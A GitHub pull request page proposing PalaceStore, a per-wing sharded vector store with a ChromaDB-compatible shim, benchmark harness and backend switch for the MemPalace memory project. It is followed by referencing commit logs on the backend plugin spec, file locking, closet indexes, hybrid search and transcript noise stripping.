POC: bespoke PalaceStore storage layer (drop-in ChromaDB replacement) #643
Draft
igorls wants to merge 3 commits into MemPalace:develop from
Conversation
Adds `palace_store/` — a new Python package implementing a vector
store designed around the palace hierarchy (wings as primary shard
key, rooms as an int-indexed structural filter, brute-force BLAS
cosine on per-wing mmap'd f32 files). Independent of mempalace
internals; consumed via a ChromaDB-compatible shim so the rest of
the repo can opt in without code changes.
Design choices grounded in measurement, not intuition:
* Per-wing sharded flat brute-force — the palace hot path is
wing+room filtered search, and per-wing sharding turns the filter
into shard selection instead of HNSW post-filter. Exact cosine
(no ANN) preserves recall by construction.
* BLAS thread limit enforced at store-construction via threadpoolctl.
At mempalace's typical shard sizes (~4000 rows × 384 dims),
OpenBLAS's per-sgemv thread spawn/sync overhead dominates compute
by 3-4x. Entering the limit once at open (not per query) avoids
the ~20 µs context-manager cost on small queries.
* Optional shard-level parallelism via ThreadPoolExecutor for
unfiltered fan-out queries. Gated on shard count ≥ 4 (dispatch
overhead dominates below), worker count defaults to
min(8, cpu_count) (memory-bandwidth bound past that).
* Room labels as int32 IDs in a parallel SQLite table, not unicode
  strings. Profiling showed the string-equality mask build cost
  100-150 µs per query at 100k drawers; an int comparison drops
  that to ~2 µs.
* int8 quantized shard variant as a separate dtype flag, for the
disk/RAM-vs-latency tradeoff (4x smaller, ~2x slower queries,
~99.1% top-10 overlap with exact).
Layout:
palace_store/
├── __init__.py
├── store.py # core: shards + sqlite + masks + dispatch
├── compat.py # ChromaDB-compatible drop-in shim
└── tests/
├── test_store.py # 23 correctness tests (f32 + int8 + parallel)
└── test_compat.py # 13 compat surface tests
Correctness: 36/36 smoke tests pass. LongMemEval R@5=0.966
(byte-for-byte equivalent to the ChromaDB baseline on the full
500-question set).
Performance at 100k drawers, 25 wings, unfiltered p50:
ChromaDB baseline: 35.1 ms
palace_store sequential: 7.0 ms (5.0× faster)
palace_store parallel: 3.4 ms (10.3× faster)
Dependencies: threadpoolctl is a soft optional dep via the
``[palace-parallel]`` extra. Without it, the store emits a one-shot
warning and runs with whatever BLAS threading the environment
provides — still functional, just measurably slower on multi-core
machines.
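A sketch of how that soft dependency might be handled. The helper name and warning text are illustrative; only the `threadpool_limits` call is real threadpoolctl API:

```python
import warnings

_warned_missing_threadpoolctl = False

def enter_blas_limit(n_threads: int = 1):
    """Pin BLAS threads once at store open (not per query), so small
    sgemv calls skip OpenBLAS's thread spawn/sync overhead. Returns a
    controller whose lifetime spans the store, or None when the
    optional dependency is absent."""
    global _warned_missing_threadpoolctl
    try:
        from threadpoolctl import threadpool_limits
    except ImportError:
        if not _warned_missing_threadpoolctl:
            warnings.warn(
                "threadpoolctl not installed; BLAS threading is left to "
                "the environment (install the [palace-parallel] extra)"
            )
            _warned_missing_threadpoolctl = True
        return None
    # Called outside a with-block, the limit applies immediately and
    # stays in effect until the returned controller is released.
    return threadpool_limits(limits=n_threads, user_api="blas")
```

Entering the limit once at construction is what avoids the per-query context-manager cost mentioned above; the one-shot flag keeps the warning from repeating on every store open.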
Adds `benchmarks/storage/` — a standalone harness for measuring
storage layer candidates independent of mempalace internals. Every
candidate implements a narrow `StoreAdapter` protocol; the harness
handles dataset generation, ingest timing, query latency percentile
measurement, on-disk footprint reporting, and cold-start probing.
Adapters shipped:
* palace — PalaceStore f32 sequential
* palace_par — PalaceStore f32 with parallel_query=True
* palace_i8 — PalaceStore int8 quantized
* chroma — ChromaDB baseline (tuned HNSW params, cosine space,
embeddings= path so the store's embedder never runs)
Benchmarks:
* bench_ingest — drawers/sec + peak RSS by batch size
* bench_query — p50/p95/p99 latency by filter shape,
with warm-pages and optional mlock support
* bench_footprint — on-disk bytes + cold-start timing via subprocess
The harness also includes:
* dataset.py — deterministic synthetic generator, caches ground
truth to .npz so correctness checks don't rerun
the O(Q·N) brute force
* recall_gate.py — asserts every adapter returns top-k sets that
match ground truth (exact adapters) or overlap
≥ 90% (approximate adapters like palace_i8)
* profile_query.py — phase-by-phase instrumented profiler of
PalaceStore.query() — this is what surfaced the
OpenBLAS thread-overhead and room-string-comparison
findings that drove the store design
* run_matrix.py — entry point, cartesian (adapter × scale), emits
JSON report comparable across runs
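The recall gate's core check reduces to a set-overlap comparison; a minimal sketch (function names are mine, not recall_gate.py's actual API):

```python
def topk_overlap(result_ids, truth_ids):
    """Fraction of the ground-truth top-k that the adapter returned
    (order-insensitive set overlap)."""
    truth = set(truth_ids)
    return len(set(result_ids) & truth) / max(len(truth), 1)

def gate(result_ids, truth_ids, exact: bool) -> None:
    """Exact adapters must match ground truth; approximate adapters
    (like the int8 variant) must overlap at least 90%."""
    floor = 1.0 if exact else 0.90
    got = topk_overlap(result_ids, truth_ids)
    if got < floor:
        raise AssertionError(f"recall {got:.3f} below floor {floor}")
```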
Scale levels mirror tests/benchmarks/ (1k → 1M). Designed to live
alongside the existing suite, not replace it — this one targets
pure storage perf, theirs targets the full mempalace stack.
8017791 to 7f27bbb
…E=palace_store) Adds a PalaceStore backend behind the ``mempalace.backends`` seam introduced in MemPalace#413, gated by the ``MEMPAL_STORAGE`` environment variable at the single choke point where ``palace.py`` instantiates its default backend:

* unset / chromadb / chroma → ChromaBackend (default, unchanged)
* palace_store / palace / palacestore → PalaceStoreBackend (new)

The whole seam is preserved — no mempalace consumer is modified outside palace.py, where ``ChromaBackend()`` is replaced by ``get_default_backend()``. Zero change to the BaseCollection contract or any of the modules that went through the MemPalace#413 refactor (searcher.py, layers.py, palace_graph.py, mcp_server.py, miner.py).

New:
* mempalace/backends/palace_store.py — PalaceStoreBackend + PalaceStoreCollection implementing BaseCollection by wrapping a palace_store.compat collection. Lazy-imports palace_store so users on the chromadb path never pay for its import graph. Preserves ChromaBackend's "no palace found" FileNotFoundError semantics on create=False so searcher/palace error surfaces stay identical across backends.

Modified (mempalace core):
* mempalace/backends/__init__.py — adds ``get_default_backend()`` dispatching on ``MEMPAL_STORAGE``. Unknown values raise rather than silently falling back — an obvious typo is better surfaced.
* mempalace/palace.py — one-line swap from direct ``ChromaBackend()`` instantiation to ``get_default_backend()``.

Modified (shim + benchmark):
* palace_store/compat.py::PersistentClient — passes through parallel_query / max_workers / blas_threads kwargs so the PalaceStoreBackend can expose them via env vars (MEMPAL_PARALLEL_QUERY, MEMPAL_MAX_WORKERS).
* benchmarks/longmemeval_bench.py — inlines its own MEMPAL_STORAGE selector (not through mempalace.backends, since the benchmark needs a chromadb-shaped EphemeralClient, not a BaseCollection).
Test fixtures routed through the seam so the suite works under either backend without duplication:

* tests/conftest.py::collection — uses palace.get_collection()
* tests/test_miner.py — uses palace.get_collection() in two places
* tests/test_convo_miner.py — uses palace.get_collection()
* tests/test_mcp_server.py::_get_collection — uses palace.get_collection()

These routed fixtures yield a BaseCollection (not a raw ChromaDB collection object), which is fine because only BaseCollection methods are actually called on the fixture. Tests that specifically exercise ChromaBackend (tests/test_backends.py) are untouched.

Drive-by fix:
* .github/workflows/ci.yml — adds ``develop`` to the push and pull_request triggers. The workflow was pinned to ``main`` only; when upstream introduced the ``develop`` branch (MemPalace#413 landed there), PRs targeting ``develop`` stopped getting CI runs. This one-line addition brings them back. Trivially revertible if the maintainers prefer a separate PR for this.

Deps:
* pyproject.toml — adds the ``[palace-parallel]`` optional extra pulling in threadpoolctl for users who want the ~3-4x BLAS thread-scoping speedup. No new hard dependencies.

Validation:
* mempalace test suite: 598/598 pass under the chromadb backend
* mempalace test suite: 598/598 pass under the palace_store backend
* palace_store unit tests: 36/36 pass
* ruff check + ruff format --check clean under ruff 0.4.10 (CI's pin)
* LongMemEval full 500: R@5=0.966, byte-equivalent on both backends
7f27bbb to 4b19fec
igorls added a commit that referenced this pull request on Apr 12, 2026
Formalizes the BaseCollection/BaseBackend contract introduced as a seam in #413 into an interchangeability spec that third-party backends can build to. Driven by six in-flight backend PRs (#574, #643, #665, #697, #700, #381), each implementing the interface differently.

Key decisions captured: entry-point distribution, typed QueryResult/GetResult replacing the Chroma dict shape, daemon-first multi-palace model via PalaceRef, required where-clause subset (incl. $contains), mandatory embedder injection with model-identity validation, capability tokens, shared pytest conformance suite, and a backend-neutral migrate/verify CLI.
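The typed-result decision could be sketched as a dataclass plus a transitional dict-style accessor for legacy callers. Field names here are guessed from Chroma's result shape; the spec's actual types may differ:

```python
from dataclasses import dataclass, field, fields

class _DictCompat:
    """Transitional shim: lets legacy callers keep using Chroma's
    dict-style access (result["ids"]) while call sites migrate to
    typed attribute access (result.ids)."""
    def __getitem__(self, key):
        if key not in {f.name for f in fields(self)}:
            raise KeyError(key)
        return getattr(self, key)

@dataclass
class QueryResult(_DictCompat):
    ids: list
    documents: list
    distances: list
    metadatas: list = field(default_factory=list)
```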
igorls added a commit that referenced this pull request on Apr 14, 2026
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct `import chromadb` outside the ChromaDB backend itself so the core modules depend only on the backend abstraction layer. Extends ChromaBackend with make_client, get_or_create_collection, delete_collection, create_collection, and backend_version. Adds update() to the BaseCollection contract. Non-backend callers (mcp_server, dedup, repair, migrate, cli) now go through the abstraction; tests patch ChromaBackend instead of chromadb. With this landed, the RFC 001 spec can be enforced and PalaceStore (#643) can ship as a plugin without touching core modules.
igorls added a commit that referenced this pull request on Apr 18, 2026
…nd registry (RFC 001 §10)

Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres, #700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target to align against.

Scope (this PR):
- Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps existing callers working while the attribute-access migration proceeds.
- BaseCollection is now kwargs-only across add/upsert/query/get/delete/update with ABC defaults for estimated_count/close/health and a non-atomic default update() (§1.1–1.2).
- PalaceRef replaces raw path strings at the backend boundary (§2.2).
- BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3).
- mempalace.backends entry-point group + in-tree registry with resolve_backend_for_palace priority order matching §3.2–3.3.
- ChromaCollection normalizes chroma returns into typed results; unknown where-clause operators raise UnsupportedFilterError (no silent drop, §1.4).
- ChromaBackend absorbs the inode/mtime client-cache freshness check previously duplicated in mcp_server._get_client() (§10 + PR #757).
- searcher.py migrated to typed-attribute access as the reference call site; remaining callers land in a follow-up.
- pyproject: chroma registered via [project.entry-points."mempalace.backends"].

Out of scope (explicit follow-ups):
- Full caller migration off the dict-compat shim across palace.py, mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py, palace_graph.py, cli.py, closet_llm.py.
- Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5).
- maintenance_state() / run_maintenance() benchmark hooks (§7.3).
- AbstractBackendContractSuite full coverage (§7.1–7.2).
- mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8).
Tests: 970 passed (up from 967 on develop); new coverage for typed results, empty-result outer-shape preservation, $regex rejection, registry lookup, priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection. Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
arncore added a commit to arncore/mempalace that referenced this pull request on Apr 25, 2026
* feat: add Hindi language support to i18n module

* Create SECURITY.md
  This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established.

* fix: save hook auto-mines transcript without MEMPAL_DIR (#840)
  TDD: test written first, failed, then fixed. Problem: the save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages. Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as an override but no longer required. Also fixed: bare python3 → $(command -v python3) for nohup safety.
  Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>

* release: v3.3.0 (#839)

* fix: add file-level locking to prevent multi-agent duplicate drawers
  Root cause: when multiple agents mine simultaneously, both pass the file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data. Fix: mine_lock() in palace.py — a cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock. Tested:
  - Lock acquires and releases correctly
  - Second agent blocks until first releases (0.25s wait)
  - 33/33 existing tests pass
  - Cross-platform: fcntl (macOS/Linux), msvcrt (Windows)
  Based on v3.2.0 tag.
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: strip system tags, hook output, and Claude UI chrome from drawers
  normalize.py now strips before filing:
  - <system-reminder>, <command-message>, <command-name> tags
  - <task-notification>, <user-prompt-submit-hook>, <hook_output> tags
  - Hook status messages (CURRENT TIME, Checking verified facts, etc.)
  - Claude Code UI chrome (ctrl+o to expand, progress bars, etc.)
  - Collapsed runs of blank lines
  This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass.
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* feat: add closet layer — searchable index pointing to drawers
  The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. Palace now has TWO collections:
  - mempalace_drawers — full verbatim content (unchanged)
  - mempalace_closets — compact AAAK-style index entries
  How it works:
  - When mining, each file gets a closet alongside its drawers
  - Closet contains extracted topics, entities, quotes as pointers
  - Closets pack up to 1500 chars, topics never split mid-entry
  - Search hits closets first (fast, small), then hydrates the full drawer content for matching files
  - Falls back to direct drawer search if no closets exist yet
  Files changed:
  - palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT
  - miner.py: process_file() now creates closets after drawers
  - searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search
  Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: enforce atomic topics in closets, extract richer pointers
  - upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic.
  - build_closet_lines returns a list of atomic lines (not joined text)
  - Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file
  - Each line is complete: topic|entities|→drawer_refs
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* docs: add CLOSETS.md — closet layer overview
  Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see the PR targeting those features) and will land together in a follow-up.
  Co-Authored-By: MSL <[email protected]>

* feat: entity metadata + diary ingest + BM25 hybrid search
  Three features that close the gap between the architecture docs and the actual codebase:
  1. Entity metadata on drawers and closets
     - _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times
     - Stamped as "entities" field in ChromaDB metadata
     - Enables filterable search by person/project name
  2. Day-based diary ingest (diary_ingest.py)
     - ONE drawer per day, upserted as the day grows
     - Closets pack topics atomically, never split mid-topic
     - Tracks entry count in state file, only processes new entries
     - Usage: python -m mempalace.diary_ingest --dir ~/summaries
  3. BM25 hybrid search in searcher.py
     - _bm25_score() keyword matching complements vector similarity
     - _hybrid_rank() combines both signals (60% vector, 40% BM25)
     - Catches exact name/term matches that embeddings miss
     - Applied to both closet-first and direct drawer search paths
  689/689 tests pass.
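The 60/40 hybrid described in that commit can be sketched as classic Okapi BM25 plus a weighted blend. This is a toy version under the assumption that both signals are normalized to [0, 1] before combining; the names echo the commit's _bm25_score/_hybrid_rank, but the bodies are mine:

```python
import math
from collections import Counter

def bm25_score(query_terms, doc_terms, df, n_docs, avgdl, k1=1.5, b=0.75):
    """Okapi BM25 for one document; df maps term -> corpus document
    frequency, avgdl is the average document length in terms."""
    tf = Counter(doc_terms)
    dl = len(doc_terms)
    score = 0.0
    for term in query_terms:
        if term not in tf:
            continue
        n_t = df.get(term, 0)
        idf = math.log(1 + (n_docs - n_t + 0.5) / (n_t + 0.5))
        score += idf * tf[term] * (k1 + 1) / (tf[term] + k1 * (1 - b + b * dl / avgdl))
    return score

def hybrid_rank(vector_sim, bm25, w_vec=0.6, w_bm25=0.4):
    """Weighted blend matching the commit's 60% vector / 40% BM25 split."""
    return w_vec * vector_sim + w_bm25 * bm25
```

The blend is what lets exact name/term hits (BM25) rescue results that pure embedding similarity would rank low.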
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* test: add tests for mine_lock, closets, entity metadata, BM25, diary
  Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass.
  Co-Authored-By: MSL <[email protected]>

* feat: explicit cross-wing tunnels for multi-project agents
  Adds active tunnel creation alongside passive tunnel discovery. Passive tunnels (existing): rooms with the same name across wings. Explicit tunnels (new): agent-created links between specific locations. "This API design in project_api relates to the database schema in project_database."
  New functions in palace_graph.py:
  - create_tunnel() — link two wing/room pairs with a label
  - list_tunnels() — list all explicit tunnels, filter by wing
  - delete_tunnel() — remove a tunnel by ID
  - follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews
  New MCP tools:
  - mempalace_create_tunnel
  - mempalace_list_tunnels
  - mempalace_delete_tunnel
  - mempalace_follow_tunnels
  Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass.
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* test: add TestTunnels for cross-wing tunnel operations
  Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass.
  Co-Authored-By: MSL <[email protected]>

* feat(search): drawer-grep returns best-matching chunk + neighbors
  When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS. Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly. Extracted from Milla's commit 935f657, which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change.
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* feat: offline fact checker against entity registry + knowledge graph
  fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls.
  Reads:
  - ~/.mempalace/known_entities.json
  - KnowledgeGraph SQLite
  Usage:
    from mempalace.fact_checker import check_text
    issues = check_text("Bob is Alice's brother", palace_path)
    # CLI
    python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace
  Extracted from Milla's commit 935f657, which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports.
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* feat: optional LLM-based closet regeneration — bring-your-own endpoint
  Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint.
  Configuration (env or CLI flag):
  - LLM_ENDPOINT — OpenAI-compatible base URL (required)
  - LLM_KEY — bearer token (optional; local inference skips this)
  - LLM_MODEL — model name (required)
  Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib. Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657).
Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and the missing-config error path. All mocked — zero network calls in tests.
  Co-Authored-By: MSL <[email protected]>

* fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795)

* Fix: set cosine distance metadata on all collection creation sites
  ChromaDB defaults the HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance, which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218

* fix: sync version.py to 3.2.0
  Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them.

* refactor: extract locked filing block to keep mine_convos under C901
  Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change.

* style: ruff format mempalace/palace.py
  Add blank lines after inline imports in mine_lock. Pure formatting.

* fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL
  The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code:
  1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies).
  2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut.
  3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary.
  These are unambiguous violations of the project's "Verbatim always" design principle.
  Fixes:
  - All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages.
  - `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved.
  - Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE.
  - "… +N lines" is line-anchored.
  - "(ctrl+o to expand)" only matches Claude Code's actual collapsed-output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact.
  Scope:
  - `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible.
  Tests:
  - 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820).
  Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise-filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + a re-mine trigger — out of scope for this PR.

* feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate
  Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently:
  - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump).
  - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine.
  - Both miners stamp drawers with the current normalize_version.
  - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into a _file_convo_chunks helper to keep mine_convos under ruff's C901 limit.
  User experience: upgrade mempalace, run `mempalace mine` as usual, and old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun.
  Tests:
  - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version-gate contract for missing/v1/current.
  - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field.
  - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped.
  Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected.
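The schema gate in that commit boils down to a single comparison. A sketch, with the constant value and metadata field name taken from the commit text and the helper name invented here:

```python
NORMALIZE_VERSION = 2  # the strip_noise fix is the v1 -> v2 bump

def drawer_is_stale(metadata: dict, current: int = NORMALIZE_VERSION) -> bool:
    """True when a drawer was mined under an older (or missing)
    normalize_version; file_already_mined treats such files as
    not-yet-mined, triggering a purge + rebuild on the next mine."""
    return metadata.get("normalize_version", 0) < current
```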
* fix: stop hooks from making agents write in chat — save tokens
  The save hook and precompact hook were telling the agent to write diary entries, add drawers, and add KG triples IN THE CHAT WINDOW. Every line written stays in conversation history and retransmits on every subsequent turn — ~$1/session in wasted tokens. Fix: hooks now say "saved in background, no action needed" and use decision: allow instead of block. The agent continues working without interruption. All filing happens via the background pipeline. Also updated the hooks README with:
  - Known limitation: hooks require session restart after install
  - Updated cost section: zero tokens, background-only
  Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: use microsecond timestamp and full content hash in diary entry ID (#819)

* fix: remove unused import 'main' from mempalace/__init__.py
  Removed the 'main' import from `mempalace/__init__.py` and updated `pyproject.toml` to point the script entry point directly to `mempalace.cli:main`. This ensures the CLI remains functional while improving code hygiene.
  Co-authored-by: igorls <[email protected]>

* merge: full hardened stack + rewrite fact_checker around actual KG API
  Merges the full hardened stack (up through #791 drawer-grep) and turns fact_checker from "dead code hidden behind a bare except" into an actually-working offline contradiction detector with tests.

  ## Dead paths the PR body advertised but the code never executed
  Both buried by a single outer ``except Exception: pass``:
  * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method; it has ``query_entity()``. The attribute error was silently swallowed and the entire KG branch always returned ``[]``. Now using ``kg.query_entity(subject, direction="outgoing")`` with proper handling of the ``predicate``/``object``/``current``/``valid_to`` fields the real API returns.
  * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only kwarg is ``db_path``. Passing ``palace_path`` raised TypeError, silently swallowed. Now computing the db_path correctly from ``<palace>/knowledge_graph.sqlite3``, matching the convention the MCP server already uses.

  ## Contradiction logic rewritten
  The previous ``if kg_pred in claim and fact.object not in claim`` only fired when the text used the SAME predicate word as the KG fact — the exact opposite of the stated use case ("Bob is Alice's brother" when the KG says "husband" would NOT have fired). Replaced with a proper parse → lookup → compare pipeline:
  * ``_extract_claims`` parses two surface forms ("X is Y's Z" and "X's Z is Y") into ``(subject, predicate, object)`` triples.
  * ``_check_kg_contradictions`` pulls the subject's outgoing facts and flags two classes:
    - ``relationship_mismatch`` when a current KG fact matches the same ``(subject, object)`` pair but with a different predicate.
    - ``stale_fact`` when the exact triple exists but is ``valid_to``-closed in the past.
  * Stale-fact detection is now implemented (the PR body claimed it; the old code silently didn't implement it).

  ## Performance fix — O(n²) → O(mentioned × n)
  ``_check_entity_confusion`` previously computed Levenshtein for every pair of registered names on every ``check_text`` call. For 1,000 registered names that's ~500K edit-distance calls per hook invocation. Now we first identify which registry names actually appear in the text (single regex scan), then only compute edit distance between mentioned and unmentioned names. Pinned by a test that asserts <200ms on a 500-name registry with zero mentions. Also: when *both* similar names are mentioned in the text, we no longer flag them — the user clearly knows they're different people.

  ## Shared entity-registry loader
  ``mempalace/miner.py`` already had an mtime-cached loader for ``~/.mempalace/known_entities.json``. fact_checker had a duplicate implementation that leaked file handles and ignored caching. Extended miner's cache to expose both the flat set (``_load_known_entities``) and the raw category dict (``_load_known_entities_raw``); fact_checker now imports the latter. No more double disk reads, no more handle leak.

  ## Tests — 24 cases in tests/test_fact_checker.py
  All three detection paths + both dead-code regressions:
  * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the correct KG constructor signature so the ``palace_path=`` bug can't come back.
  * ``test_relationship_mismatch_detected`` — the headline example from the PR body now actually fires.
  * ``test_stale_fact_detected`` — a valid_to-closed triple is flagged.
  * ``test_current_fact_same_triple_is_not_flagged`` — no false positive on a still-valid match.
  * ``test_performance_bounded_by_mentioned_names`` — 500-name registry, zero mentions, <200ms. Regression for the O(n²) blowup.
  * ``test_no_false_positive_when_both_names_mentioned`` — Mila and Milla in the same text is fine.
  * Plus claim extraction, flatten_names shapes, CLI exit code, empty text handling, missing-palace graceful fallback, registry-dict shape support.
  785/785 suite pass. ruff + format clean on CI-pinned 0.4.x.

* Optimize entity detection with regex caching and pre-compilation
  - Use functools.lru_cache to cache compiled patterns for entity names.
  - Pre-compile static pronoun patterns into a single regex.
  - Remove redundant .lower() calls in the score_entity loop.
  Co-authored-by: igorls <[email protected]>

* docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787)
  Follow-up to #766, which covers version.py, pyproject.toml, README, CHANGELOG, and CONTRIBUTING. These 11 files still had the old org name in URLs:
  - website/ (VitePress config + 6 docs pages)
  - .claude-plugin/ (plugin.json repository, README marketplace command)
  - .codex-plugin/ (plugin.json URLs, README links)
  Author name fields are intentionally unchanged.
* test: make diary state path assertion platform-neutral

The Windows CI job failed on:

    assert '/.mempalace/state/' in str(state_path)

because Windows uses ``\`` as the path separator, so the substring never matches. The behavior under test (state file lives outside the diary dir, under ``~/.mempalace/state/``) is already correct on both platforms — only the assertion was Unix-only. Switch to ``state_path.parent`` comparisons that work on any OS.

* test: serialize mine_lock concurrency test with multiprocessing

The macOS CI job failed ``test_lock_blocks_concurrent_access`` because ``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads in the same process both acquire even when they open their own file descriptors. The test passed on Linux (per-FD flock) and Windows (per-FD ``msvcrt.locking``) but was never actually exercising the lock's real contract.

``mine_lock`` is designed to serialize multi-*agent* access — i.e., separate processes, not threads. Switch the test to ``multiprocessing.get_context('spawn')`` with a module-level worker (so the spawn pickles cleanly) so it:

1. reflects the actual use case (one lock per mining process);
